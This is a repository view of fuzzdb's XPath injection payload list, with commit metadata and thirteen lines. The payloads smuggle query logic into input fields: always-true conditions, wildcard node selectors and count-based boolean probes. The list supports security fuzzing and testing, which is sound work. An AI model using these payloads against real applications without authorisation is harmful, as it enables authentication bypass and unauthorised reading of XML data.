fuzzdb/attack/xpath/xpath-injection.txt
Ricardo Madriz 2863f7a588 Fix #144
2016-05-25 17:56:24 -06:00

13 lines
No EOL
209 B
Text

' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
@*
count(/child::node())
x' or name()='username' or 'x'='y
' and count(/*)=1 and '1'='1
' and count(/@*)=1 and '1'='1
' and count(/comment())=1 and '1'='1